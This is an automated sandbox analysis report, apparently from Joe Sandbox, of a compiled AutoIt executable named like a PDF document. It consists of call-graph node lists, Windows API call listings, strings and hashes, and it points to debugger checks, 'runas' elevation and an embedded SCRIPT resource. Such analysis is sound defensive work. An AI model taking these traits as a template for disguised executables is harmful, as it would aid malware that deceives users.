1599d2 __tzset_nolock _wcscmp 99316->99321 99317 159866 99317->98790 99317->98817 99318 159393 GetSystemTimeAsFileTime 99318->99321 99319 f506b 74 API calls 99319->99321 99320 f5045 85 API calls 99320->99321 99321->99317 99321->99318 99321->99319 99321->99320 99323 158d9b 99322->99323 99324 158da9 99322->99324 99325 11548b 115 API calls 99323->99325 99326 158dee 99324->99326 99327 11548b 115 API calls 99324->99327 99337 158db2 99324->99337 99325->99324 99353 15901b 99326->99353 99329 158dd3 99327->99329 99329->99326 99331 158ddc 99329->99331 99330 158e32 99332 158e57 99330->99332 99333 158e36 99330->99333 99334 1155d6 __fcloseall 83 API calls 99331->99334 99331->99337 99357 158c33 99332->99357 99336 158e43 99333->99336 99339 
1155d6 __fcloseall 83 API calls 99333->99339 99334->99337 99336->99337 99341 1155d6 __fcloseall 83 API calls 99336->99341 99337->98819 99339->99336 99340 158e85 99366 158eb5 99340->99366 99341->99337 99342 158e72 99342->99337 99348 1155d6 __fcloseall 83 API calls 99342->99348 99343 158e65 99343->99342 99345 1155d6 __fcloseall 83 API calls 99343->99345 99345->99342 99348->99337 99350 158ea0 99350->99337 99352 1155d6 __fcloseall 83 API calls 99350->99352 99352->99337 99354 159040 99353->99354 99356 159029 __tzset_nolock _memmove 99353->99356 99355 115812 __fread_nolock 74 API calls 99354->99355 99355->99356 99356->99330 99358 11594c std::exception::_Copy_str 58 API calls 99357->99358 99359 158c42 99358->99359 99360 11594c std::exception::_Copy_str 58 API calls 99359->99360 99361 158c56 99360->99361 99362 11594c std::exception::_Copy_str 58 API calls 99361->99362 99363 158c6a 99362->99363 99364 158f97 58 API calls 99363->99364 99365 158c7d 99363->99365 99364->99365 99365->99340 99365->99343 99368 158eca 99366->99368 99367 158f82 99395 1591bf 99367->99395 99368->99367 99370 158c8f 74 API calls 99368->99370 99373 158e8c 99368->99373 99399 158d2b 74 API calls 99368->99399 99400 15909c 80 API calls 99368->99400 99370->99368 99374 158f97 99373->99374 99375 158fa4 99374->99375 99376 158faa 99374->99376 99377 112f95 _free 58 API calls 99375->99377 99378 112f95 _free 58 API calls 99376->99378 99379 158fbb 99376->99379 99377->99376 99378->99379 99380 158e93 99379->99380 99381 112f95 _free 58 API calls 99379->99381 99380->99350 99382 1155d6 99380->99382 99381->99380 99383 1155e2 _raise 99382->99383 99384 1155f6 99383->99384 99385 11560e 99383->99385 99482 118d68 58 API calls __getptd_noexit 99384->99482 99388 116e4e __lock_file 59 API calls 99385->99388 99391 115606 _raise 99385->99391 99387 1155fb 99483 118ff6 9 API calls __mbschr_l 99387->99483 99390 115620 99388->99390 99466 11556a 99390->99466 99391->99350 99396 1591dd 99395->99396 99397 1591cc 99395->99397 99396->99373 
99401 114a93 99397->99401 99399->99368 99400->99368 99402 114a9f _raise 99401->99402 99403 114ad5 99402->99403 99404 114abd 99402->99404 99406 114acd _raise 99402->99406 99407 116e4e __lock_file 59 API calls 99403->99407 99426 118d68 58 API calls __getptd_noexit 99404->99426 99406->99396 99409 114adb 99407->99409 99408 114ac2 99427 118ff6 9 API calls __mbschr_l 99408->99427 99414 11493a 99409->99414 99417 114949 99414->99417 99420 114967 99414->99420 99415 114957 99457 118d68 58 API calls __getptd_noexit 99415->99457 99417->99415 99417->99420 99423 114981 _memmove 99417->99423 99418 11495c 99458 118ff6 9 API calls __mbschr_l 99418->99458 99428 114b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 99420->99428 99423->99420 99424 114916 __filbuf 58 API calls 99423->99424 99429 11dac6 99423->99429 99459 114c6d 99423->99459 99465 11b05e 78 API calls 6 library calls 99423->99465 99424->99423 99426->99408 99427->99406 99428->99406 99430 11dad2 _raise 99429->99430 99431 11daf6 99430->99431 99432 11dadf 99430->99432 99434 11db95 99431->99434 99437 11db0a 99431->99437 99433 118d34 __lseeki64 58 API calls 99432->99433 99436 11dae4 99433->99436 99435 118d34 __lseeki64 58 API calls 99434->99435 99438 11db2d 99435->99438 99439 118d68 __mbschr_l 58 API calls 99436->99439 99440 11db32 99437->99440 99441 11db28 99437->99441 99444 118d68 __mbschr_l 58 API calls 99438->99444 99452 11daeb _raise 99439->99452 99442 11d446 ___lock_fhandle 59 API calls 99440->99442 99443 118d34 __lseeki64 58 API calls 99441->99443 99445 11db38 99442->99445 99443->99438 99446 11dba1 99444->99446 99447 11db4b 99445->99447 99448 11db5e 99445->99448 99449 118ff6 __mbschr_l 9 API calls 99446->99449 99450 11dbb5 __write_nolock 76 API calls 99447->99450 99451 118d68 __mbschr_l 58 API calls 99448->99451 99449->99452 99453 11db57 99450->99453 99454 11db63 99451->99454 99452->99423 99456 11db8d __write LeaveCriticalSection 99453->99456 99455 118d34 __lseeki64 58 API calls 99454->99455 99455->99453 
99456->99452 99457->99418 99458->99420 99460 114c80 99459->99460 99464 114ca4 99459->99464 99461 114916 __filbuf 58 API calls 99460->99461 99460->99464 99462 114c9d 99461->99462 99463 11dac6 __write 78 API calls 99462->99463 99463->99464 99464->99423 99465->99423 99467 115579 99466->99467 99468 11558d 99466->99468 99515 118d68 58 API calls __getptd_noexit 99467->99515 99471 114c6d __flush 78 API calls 99468->99471 99480 115589 99468->99480 99470 11557e 99516 118ff6 9 API calls __mbschr_l 99470->99516 99473 115599 99471->99473 99485 120dc7 99473->99485 99476 114916 __filbuf 58 API calls 99477 1155a7 99476->99477 99489 120c52 99477->99489 99479 1155ad 99479->99480 99481 112f95 _free 58 API calls 99479->99481 99484 115645 LeaveCriticalSection LeaveCriticalSection __wfsopen 99480->99484 99481->99480 99482->99387 99483->99391 99484->99391 99486 1155a1 99485->99486 99487 120dd4 99485->99487 99486->99476 99487->99486 99488 112f95 _free 58 API calls 99487->99488 99488->99486 99490 120c5e _raise 99489->99490 99491 120c82 99490->99491 99492 120c6b 99490->99492 99494 120d0d 99491->99494 99496 120c92 99491->99496 99541 118d34 58 API calls __getptd_noexit 99492->99541 99546 118d34 58 API calls __getptd_noexit 99494->99546 99495 120c70 99542 118d68 58 API calls __getptd_noexit 99495->99542 99499 120cb0 99496->99499 99500 120cba 99496->99500 99543 118d34 58 API calls __getptd_noexit 99499->99543 99517 11d446 99500->99517 99501 120cb5 99547 118d68 58 API calls __getptd_noexit 99501->99547 99503 120c77 _raise 99503->99479 99506 120cc0 99508 120cd3 99506->99508 99509 120cde 99506->99509 99507 120d19 99548 118ff6 9 API calls __mbschr_l 99507->99548 99526 120d2d 99508->99526 99544 118d68 58 API calls __getptd_noexit 99509->99544 99513 120cd9 99545 120d05 LeaveCriticalSection __unlock_fhandle 99513->99545 99515->99470 99516->99480 99518 11d452 _raise 99517->99518 99519 11d4a1 EnterCriticalSection 99518->99519 99520 119e4b __lock 58 API calls 99518->99520 99521 11d4c7 _raise 
99519->99521 99522 11d477 99520->99522 99521->99506 99523 11d48f 99522->99523 99549 11a06b InitializeCriticalSectionAndSpinCount 99522->99549 99550 11d4cb LeaveCriticalSection _doexit 99523->99550 99551 11d703 99526->99551 99528 120d91 99564 11d67d 59 API calls 2 library calls 99528->99564 99530 120d3b 99530->99528 99533 11d703 __commit 58 API calls 99530->99533 99540 120d6f 99530->99540 99531 11d703 __commit 58 API calls 99534 120d7b FindCloseChangeNotification 99531->99534 99532 120d99 99538 120dbb 99532->99538 99565 118d47 58 API calls 3 library calls 99532->99565 99535 120d66 99533->99535 99534->99528 99536 120d87 GetLastError 99534->99536 99539 11d703 __commit 58 API calls 99535->99539 99536->99528 99538->99513 99539->99540 99540->99528 99540->99531 99541->99495 99542->99503 99543->99501 99544->99513 99545->99503 99546->99501 99547->99507 99548->99503 99549->99523 99550->99519 99552 11d70e 99551->99552 99553 11d723 99551->99553 99554 118d34 __lseeki64 58 API calls 99552->99554 99556 118d34 __lseeki64 58 API calls 99553->99556 99558 11d748 99553->99558 99555 11d713 99554->99555 99557 118d68 __mbschr_l 58 API calls 99555->99557 99559 11d752 99556->99559 99560 11d71b 99557->99560 99558->99530 99561 118d68 __mbschr_l 58 API calls 99559->99561 99560->99530 99562 11d75a 99561->99562 99563 118ff6 __mbschr_l 9 API calls 99562->99563 99563->99560 99564->99532 99565->99538 99567 1109e2 __write_nolock 99566->99567 99568 1109f1 GetLongPathNameW 99567->99568 99569 f7d2c 59 API calls 99568->99569 99570 f741d 99569->99570 99571 f716b 99570->99571 99572 f77c7 59 API calls 99571->99572 99573 f717d 99572->99573 99574 f48ae 60 API calls 99573->99574 99575 f7188 99574->99575 99576 12ecae 99575->99576 99577 f7193 99575->99577 99582 12ecc8 99576->99582 99624 f7a68 61 API calls 99576->99624 99578 f3f84 59 API calls 99577->99578 99580 f719f 99578->99580 99618 f34c2 99580->99618 99583 f71b2 Mailbox 99583->98596 99585 f4f3d 136 API calls 99584->99585 99586 f69ef 99585->99586 99587 
12e45a 99586->99587 99589 f4f3d 136 API calls 99586->99589 99588 1597e5 122 API calls 99587->99588 99590 12e46f 99588->99590 99591 f6a03 99589->99591 99593 12e473 99590->99593 99594 12e490 99590->99594 99591->99587 99592 f6a0b 99591->99592 99595 f6a17 99592->99595 99596 12e47b 99592->99596 99597 f4faa 84 API calls 99593->99597 99598 110ff6 Mailbox 59 API calls 99594->99598 99625 f6bec 99595->99625 99732 154534 90 API calls _wprintf 99596->99732 99597->99596 99607 12e4d5 Mailbox 99598->99607 99602 12e489 99602->99594 99603 12e689 99604 112f95 _free 58 API calls 99603->99604 99605 12e691 99604->99605 99606 f4faa 84 API calls 99605->99606 99609 12e69a 99606->99609 99607->99603 99607->99609 99615 f7f41 59 API calls 99607->99615 99718 f766f 99607->99718 99726 f74bd 99607->99726 99733 14fc4d 59 API calls 2 library calls 99607->99733 99734 14fb6e 61 API calls 2 library calls 99607->99734 99735 157621 59 API calls Mailbox 99607->99735 99612 112f95 _free 58 API calls 99609->99612 99613 f4faa 84 API calls 99609->99613 99736 14fcb1 89 API calls 4 library calls 99609->99736 99612->99609 99613->99609 99615->99607 99619 f34d4 99618->99619 99623 f34f3 _memmove 99618->99623 99621 110ff6 Mailbox 59 API calls 99619->99621 99620 110ff6 Mailbox 59 API calls 99622 f350a 99620->99622 99621->99623 99622->99583 99623->99620 99624->99576 99626 12e847 99625->99626 99627 f6c15 99625->99627 99828 14fcb1 89 API calls 4 library calls 99626->99828 99742 f5906 60 API calls Mailbox 99627->99742 99630 f6c37 99743 f5956 99630->99743 99631 12e85a 99829 14fcb1 89 API calls 4 library calls 99631->99829 99634 f6c54 99637 f77c7 59 API calls 99634->99637 99636 12e876 99666 f6cc1 99636->99666 99638 f6c60 99637->99638 99756 110b9b 60 API calls __write_nolock 99638->99756 99640 f6ccf 99644 f77c7 59 API calls 99640->99644 99641 12e889 99643 f5dcf CloseHandle 99641->99643 99642 f6c6c 99645 f77c7 59 API calls 99642->99645 99646 12e895 99643->99646 99647 f6cd8 99644->99647 99648 f6c78 99645->99648 99650 f4f3d 
[Call-graph edge list rendered by the Joe Sandbox IDA plugin (node ids, function offsets and per-node API call counts); graph data omitted. APIs named on the graph nodes: ReadFile, WriteFile, SetFilePointerEx, CreateFileW, CloseHandle, GetLastError, VariantClear, CharUpperBuffW, CharLowerBuffW, GetCurrentProcess, TerminateProcess, FreeLibrary, VirtualAlloc, GetVersionExW, IsWow64Process, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, GetStdHandle, OleInitialize, CreateThread, RegisterWindowMessageW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, PostQuitMessage, DefWindowProcW, SetTimer, KillTimer, CreatePopupMenu, MoveWindow, SetFocus, Shell_NotifyIconW, DeleteObject, DestroyWindow, Sleep and GetPEB (the last two in the 36e0000 region), plus CRT helpers _memmove, _memset, _free, _strcat, _wcscpy, __cinit and __wsetenvp.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F3B7A
• IsDebuggerPresent.KERNEL32 ref: 000F3B8C
• GetFullPathNameW.KERNEL32(00007FFF,?,?,001B62F8,001B62E0,?,?), ref: 000F3BFD
  • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
  • Part of subcall function 00100A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000F3C26,001B62F8,?,?,?), ref: 00100ACE
• SetCurrentDirectoryW.KERNEL32(?), ref: 000F3C81
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001A93F0,00000010), ref: 0012D4BC
• SetCurrentDirectoryW.KERNEL32(?,001B62F8,?,?,?), ref: 0012D4F4
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001A5D40,001B62F8,?,?,?), ref: 0012D57A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0012D581
  • Part of subcall function 000F3A58: GetSysColorBrush.USER32(0000000F), ref: 000F3A62
  • Part of subcall function 000F3A58: LoadCursorW.USER32(00000000,00007F00), ref: 000F3A71
  • Part of subcall function 000F3A58: LoadIconW.USER32(00000063), ref: 000F3A88
  • Part of subcall function 000F3A58: LoadIconW.USER32(000000A4), ref: 000F3A9A
  • Part of subcall function 000F3A58: LoadIconW.USER32(000000A2), ref: 000F3AAC
  • Part of subcall function 000F3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000F3AD2
  • Part of subcall function 000F3A58: RegisterClassExW.USER32(?), ref: 000F3B28
  • Part of subcall function 000F39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000F3A15
  • Part of subcall function 000F39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000F3A36
  • Part of subcall function 000F39E7: ShowWindow.USER32(00000000,?,?), ref: 000F3A4A
  • Part of subcall function 000F39E7: ShowWindow.USER32(00000000,?,?), ref: 000F3A53
  • Part of subcall function 000F43DB: _memset.LIBCMT ref: 000F4401
  • Part of subcall function 000F43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000F44A6
Strings
• runas, xrefs: 0012D575
• This is a third-party compiled AutoIt script., xrefs: 0012D4B4
Memory Dump Source
• Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
• Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 529118366-3287110873
• Opcode ID: 132b0f6cd6c0c28969b38c3de321aafbd20004fc9ea68ffcb071eabffdf5bb55
• Instruction ID: 2bf4cf3c94f812f4c6824e753790bc84d29feab5de459420710f066cb8b7c53c
• Opcode Fuzzy Hash: 132b0f6cd6c0c28969b38c3de321aafbd20004fc9ea68ffcb071eabffdf5bb55
• Instruction Fuzzy Hash: 7E51293090824CAEDF11EBB4EC05EFE7B74EF14310F0441B9F655669A2CB784A86EB61

                                                            Control-flow Graph (rendered image; legend: Executed / Not Executed). Function entry block f4afe-f4b5e; API-calling blocks: GetVersionExW (f4afe-f4b5e), GetCurrentProcess and IsWow64Process (f4bf1-f4c08), GetNativeSystemInfo (f4c41-f4c45), FreeLibrary (f4c4d-f4c50), GetSystemInfo (f4c7d-f4c87 and f4c89-f4c93).
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 000F4B2B
                                                              • Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66
                                                            • GetCurrentProcess.KERNEL32(?,0017FAEC,00000000,00000000,?), ref: 000F4BF8
                                                            • IsWow64Process.KERNEL32(00000000), ref: 000F4BFF
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 000F4C45
                                                            • FreeLibrary.KERNEL32(00000000), ref: 000F4C50
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 000F4C81
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 000F4C8D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 70dafb64afe295a6a750c9ccc40835f69dc4c6cdb658db5e09726aa8b4905d1c
                                                            • Instruction ID: e4f04ce64b0c62572a9d298197832a28416b75101947070ea9426f04d536591a
                                                            • Opcode Fuzzy Hash: 70dafb64afe295a6a750c9ccc40835f69dc4c6cdb658db5e09726aa8b4905d1c
                                                            • Instruction Fuzzy Hash: BA91C53154A7C4DEC731CB68A5611BBBFE4AF2A300B48499DD5CA93E42D320E948D75A

                                                            Control-flow Graph (rendered image; legend: Executed / Not Executed). Function entry block f4fe9-f5001; API-calling blocks: CreateStreamOnHGlobal (f4fe9-f5001), FindResourceExW (f5003-f501a), LoadResource (12dd5c-12dd6b), SizeofResource (12dd71-12dd7f), LockResource (12dd85-12dd90).
                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000F4EEE,?,?,00000000,00000000), ref: 000F4FF9
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000F4EEE,?,?,00000000,00000000), ref: 000F5010
                                                            • LoadResource.KERNEL32(?,00000000,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F), ref: 0012DD60
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F), ref: 0012DD75
                                                            • LockResource.KERNEL32(000F4EEE,?,?,000F4EEE,?,?,00000000,00000000,?,?,?,?,?,?,000F4F8F,00000000), ref: 0012DD88
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: f442ae20c2f0fb243eb895c4549ab109d23df8955330cc3d943a1b56ff1b6e29
                                                            • Instruction ID: 6cc73c080f0756fa8927df6a7618fba9d5160fe4a22ee1650fa8e832aa29b045
                                                            • Opcode Fuzzy Hash: f442ae20c2f0fb243eb895c4549ab109d23df8955330cc3d943a1b56ff1b6e29
                                                            • Instruction Fuzzy Hash: 04115E75240704AFD7218B65EC58F677BB9EBC9B11F20416CF609C6660DB61EC819660
                                                            APIs
                                                            • IsThemeActive.UXTHEME ref: 000F4992
                                                              • Part of subcall function 001135AC: __lock.LIBCMT ref: 001135B2
                                                              • Part of subcall function 001135AC: DecodePointer.KERNEL32(00000001,?,000F49A7,001481BC), ref: 001135BE
                                                              • Part of subcall function 001135AC: EncodePointer.KERNEL32(?,?,000F49A7,001481BC), ref: 001135C9
                                                              • Part of subcall function 000F4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000F4A73
                                                              • Part of subcall function 000F4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000F4A88
                                                              • Part of subcall function 000F3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000F3B7A
                                                              • Part of subcall function 000F3B4C: IsDebuggerPresent.KERNEL32 ref: 000F3B8C
                                                              • Part of subcall function 000F3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,001B62F8,001B62E0,?,?), ref: 000F3BFD
                                                              • Part of subcall function 000F3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 000F3C81
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000F49D2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                            • String ID: P
                                                            • API String ID: 1438897964-1343716551
                                                            • Opcode ID: 3b3959f62cf5ab2e214fee59de35c9be437de411c31f11ebe15afcd2a3665a5b
                                                            • Instruction ID: 1cc23d418b5f8663b3a7c58eab4301466e4b7ba93d6e30a8c5512995777cbd40
                                                            • Opcode Fuzzy Hash: 3b3959f62cf5ab2e214fee59de35c9be437de411c31f11ebe15afcd2a3665a5b
                                                            • Instruction Fuzzy Hash: 4611CD719183059FC300DF28DC0596BFBF8EBA4710F00461EF554836B2DBB48A95CB92
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,0012E7C1), ref: 001546A6
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 001546B7
                                                            • FindClose.KERNEL32(00000000), ref: 001546C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: cb0cbbb6f01dc6bc12f5fd4878b15753444106cfb8b5b153580892a1defda98e
                                                            • Instruction ID: f520152a15a241bd81d13b5dfba701d47cffe3d1d0904f9433727835edefad2a
                                                            • Opcode Fuzzy Hash: cb0cbbb6f01dc6bc12f5fd4878b15753444106cfb8b5b153580892a1defda98e
                                                            • Instruction Fuzzy Hash: 09E020318144009B42106738EC4D4EB776CDF0633AF100719FC79C24E0E7B09DD486D9
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 0013428C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: b93daa6ba7608337c2f8e1cb226867012ac750931996b3bc0108f8caad6a7dcf
                                                            • Instruction ID: 30319eb73bdca5cf6ef6e2bb7318594802a3b2eab0e7719bfc0653ec431feed9
                                                            • Opcode Fuzzy Hash: b93daa6ba7608337c2f8e1cb226867012ac750931996b3bc0108f8caad6a7dcf
                                                            • Instruction Fuzzy Hash: 0DA28D74A04249CFCB24CF58C480ABEB7F1FF58300F648169EA16AB761D775AD82DB91
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00100BBB
                                                            • timeGetTime.WINMM ref: 00100E76
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00100FB3
                                                            • TranslateMessage.USER32(?), ref: 00100FC7
                                                            • DispatchMessageW.USER32(?), ref: 00100FD5
                                                            • Sleep.KERNEL32(0000000A), ref: 00100FDF
                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 0010105A
                                                            • DestroyWindow.USER32 ref: 00101066
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00101080
                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 001352AD
                                                            • TranslateMessage.USER32(?), ref: 0013608A
                                                            • DispatchMessageW.USER32(?), ref: 00136098
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001360AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                            • API String ID: 4003667617-3242690629
                                                            • Opcode ID: 147372955c89bd9917bc7c541f58128233e2e24cfd02c8357782dbf203722f1e
                                                            • Instruction ID: e99b79b897cd0cda2c0f721e031959ad964195106342ca36965ab801cf52ec32
                                                            • Opcode Fuzzy Hash: 147372955c89bd9917bc7c541f58128233e2e24cfd02c8357782dbf203722f1e
                                                            • Instruction Fuzzy Hash: A5B2E470608741DFD729DF24C884BAAB7E6FF84704F14491DF58A972A1DBB0E885DB82

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001591E9: __time64.LIBCMT ref: 001591F3
                                                              • Part of subcall function 000F5045: _fseek.LIBCMT ref: 000F505D
                                                            • __wsplitpath.LIBCMT ref: 001594BE
                                                              • Part of subcall function 0011432E: __wsplitpath_helper.LIBCMT ref: 0011436E
                                                            • _wcscpy.LIBCMT ref: 001594D1
                                                            • _wcscat.LIBCMT ref: 001594E4
                                                            • __wsplitpath.LIBCMT ref: 00159509
                                                            • _wcscat.LIBCMT ref: 0015951F
                                                            • _wcscat.LIBCMT ref: 00159532
                                                              • Part of subcall function 0015922F: _memmove.LIBCMT ref: 00159268
                                                              • Part of subcall function 0015922F: _memmove.LIBCMT ref: 00159277
                                                            • _wcscmp.LIBCMT ref: 00159479
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AAE
                                                              • Part of subcall function 001599BE: _wcscmp.LIBCMT ref: 00159AC1
                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 001596DC
